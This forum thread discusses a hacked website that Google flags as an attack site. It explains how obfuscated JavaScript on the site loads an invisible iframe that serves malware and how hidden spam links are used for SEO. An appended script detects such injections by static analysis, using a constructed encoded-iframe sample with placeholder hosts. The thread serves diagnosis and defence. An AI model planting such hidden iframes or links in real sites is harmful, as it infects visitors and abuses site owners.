Jane, I didn't get that warning when I went there just now in Safari. However, in FF, I did get the attack site warning. What is the IP number associated with the site? It should be on the malware warning at the bottom - but you've covered it with the attack site warning I think. Since I'm not getting the malware warning, I can't see it.
When I click on the link to the Google diagnostics in the attack site warning I get this:
QUOTE
What happened when Google visited sites hosted on this network?
Of the 15276 site(s) we tested on this network over the past 90 days, 2065 site(s), including, for example, couponsdeal.com/, tjw-uk.com/, worldofmen.org/, served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2009-02-04, and the last time suspicious content was found was on 2009-02-04.
Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, we found 46 site(s) on this network, including, for example, free-social-tools.com/, sudokus2go.com/, woodyspornnetwork.com/, that appeared to function as intermediaries for the infection of 140 other site(s) including, for example, hausverwaltersuche.de/, caw2.com/, downloadyoutubevids.com/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 127 site(s), including, for example, xdxbx.com/, worldvedro.com/, free-social-tools.com/, that infected 1666 other site(s), including, for example, bedoon.net/, almosafr.com/, samaq8.com/.
Next steps:
* Return to the previous page.
Updated 4 hours ago
The service provider, servage.net in Germany, appears to be having some ongoing issues - apparently not solved as this site claims:
http://allensmithnet.vox.com/library/post/...ensmithnet.html
QUOTE
A question, what the heck does the criminal gain by doing such a thing?
In this case, money. (See some of the links I listed - they more or less explain things.) The virus probably does something like allow your computer to be taken over remotely by the hackers to send out masses of spam; some of which of course does stuff like drive people to fake PayPal or bank sites.
As for keeping search engines off your site, you should also create a robots.txt file. Instructions here:
http://www.e-myth.com/cs/user/print/post/w...-block-the-bots (and look at the NYT example he links to - you could copy it and just add all the major search engines)
Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)?
The one at the top.
The script is written in a highly obfuscated way, but it's easy to decode if you know a little bit about how JavaScript works.
These obfuscated scripts work by taking an encoded string, decoding it, and then putting it into the Web page by using a document.write command or an eval command. You can sort them out by saving the HTML to disk, opening them in a text editor, and looking for anything that says document.write or eval. You change the document.write or eval command to alert (the command to pop up a box), then open the HTML file in your browser. A window will pop up containing the decoded JavaScript.
In this case, the decoded JavaScript opens an invisible iFrame from http://7speed.info, a site hosted in Russia. The invisible frame contains instructions to trick Internet Explorer into downloading a virus.
Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The javascript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so the virus problem isn't the only hack going on here.
Yes. Technically, the "display = none" isn't JavaScript, it's CSS.
All kinds of sites use this CSS. For example, if you go to a Web site that causes a picture to appear in the middle of the screen when you click a link (iWeb can do this), the picture is actually always there. It's loaded when the page loads but it is set to display = none. When you click a button or a link the display = none is changed and bink! There it is, like magic.
The purpose of putting the hidden porn links in there is money. Google's page rank works by the number of people who link *to you*. The more other web sites that link to you, the higher your page appears in the searches. So hackers make their own pages appear higher in Google's searches by hacking other people's sites and then placing links on the hacked sites to their own sites.
The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.
That would probably be a good idea, but I think the site owner may be MIA.
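The check described in the thread above (look in the saved HTML for document.write or eval, see what the encoded string decodes to, and look for links hidden with display: none) can also be done without opening the page in a browser. The following is an added example, not code from the thread: the sample page, host names and the `inspectPage` function are constructed for illustration, and it assumes the simple case where the script hides its payload as a percent-encoded string literal.

```javascript
// Constructed sample: a saved page whose script hides an iframe behind
// percent-encoding, plus one link hidden with CSS. Host names are placeholders.
const hidden = '<iframe src="http://frame-host.example/in.php" width="0" height="0" style="display:none"></iframe>';
const encoded = Array.from(hidden, c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
const SAMPLE_PAGE = `<html><body>
<script>document.write(unescape("${encoded}"));</script>
<p>Welcome to my site</p>
<div style="display: none"><a href="http://links.example/a">x</a></div>
</body></html>`;

// Statically inspect saved HTML; nothing from the page is ever executed.
function inspectPage(html) {
  const findings = { sinks: [], decoded: [], iframes: [], hiddenLinks: [] };
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  for (const [, body] of html.matchAll(scriptRe)) {
    // The two sinks the thread says to look for.
    for (const [sink] of body.matchAll(/\b(?:document\.write(?:ln)?|eval)\s*\(/g)) {
      findings.sinks.push(sink.replace(/\s*\($/, ''));
    }
    // Decode long percent-encoded string literals as data, not as code.
    for (const [, lit] of body.matchAll(/["']((?:%[0-9a-fA-F]{2}){8,})["']/g)) {
      findings.decoded.push(lit.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16))));
    }
  }
  // Look for iframes and hidden anchors in the raw page and in decoded strings.
  for (const text of [html, ...findings.decoded]) {
    for (const [, src] of text.matchAll(/<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)) {
      findings.iframes.push(src);
    }
    const hiddenBlock = /<(\w+)\b[^>]*display\s*:\s*none[^>]*>([\s\S]*?)<\/\1>/gi;
    for (const [, , inner] of text.matchAll(hiddenBlock)) {
      for (const [, href] of inner.matchAll(/<a\b[^>]*\bhref\s*=\s*["']([^"']+)["']/gi)) {
        findings.hiddenLinks.push(href);
      }
    }
  }
  return findings;
}

console.log(inspectPage(SAMPLE_PAGE));
```

Scripts that build their string with other encodings or several decoding layers will show up in `sinks` but not in `decoded`; those still need the manual review described in the thread.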